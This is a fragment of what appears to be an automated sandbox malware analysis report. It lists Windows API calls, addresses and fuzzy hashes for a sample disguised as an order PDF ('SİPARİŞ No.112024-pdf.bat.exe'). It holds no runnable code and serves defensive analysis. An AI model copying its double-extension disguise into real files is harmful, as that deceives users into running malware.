                                                                  • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                  • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                  APIs
                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                  Similarity
                                                                  • API ID: Window$EnableShow
                                                                  • String ID:
                                                                  • API String ID: 1136574915-0
                                                                  • Opcode ID: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                  • Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
                                                                  • Opcode Fuzzy Hash: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                  • Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                    • Part of subcall function 004065EE: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                    • Part of subcall function 004065EE: wsprintfW.USER32 ref: 00406640
                                                                    • Part of subcall function 004065EE: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                  • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                  • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                  • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                  • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                  • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  • Opcode ID: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                                  • Instruction ID: bb989e29a52a93802ac21e82b74e9b17d97bb9506e6cfc7636de57e0f2ab50b5
                                                                  • Opcode Fuzzy Hash: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                                  • Instruction Fuzzy Hash: B8E09271E14104AFD710DBA5AE0ACBEB7B8DB84318B20403BF201F50D1CA794E118E3E
                                                                  APIs
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                  • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                  • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                  • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                  • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                  • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                  • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                  • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                  • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                  • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(6FBC405C,00000004,00000040,6FBC404C), ref: 6FBC29B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                   • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                                                   • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: a9a07f4fad6d4ac63cd121176d9e2b3ba1f662b66208a4d2761b948c41563378
                                                                  • Instruction ID: 1566f7b81081c6dbb248daf258cd4eb0617e8a8fc4bce13e0bd4d7959dcb6f54
                                                                  • Opcode Fuzzy Hash: a9a07f4fad6d4ac63cd121176d9e2b3ba1f662b66208a4d2761b948c41563378
                                                                  • Instruction Fuzzy Hash: 89F0A5B1588A80DFCB50CF6A94447073BF0F74E324B0349AAE1A9D7240E3744266DB1A
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                  • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                  • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                  • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                  • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                  • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                  • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                  • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                  • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                  • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                                  • GlobalFree.KERNEL32(?), ref: 00405098
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
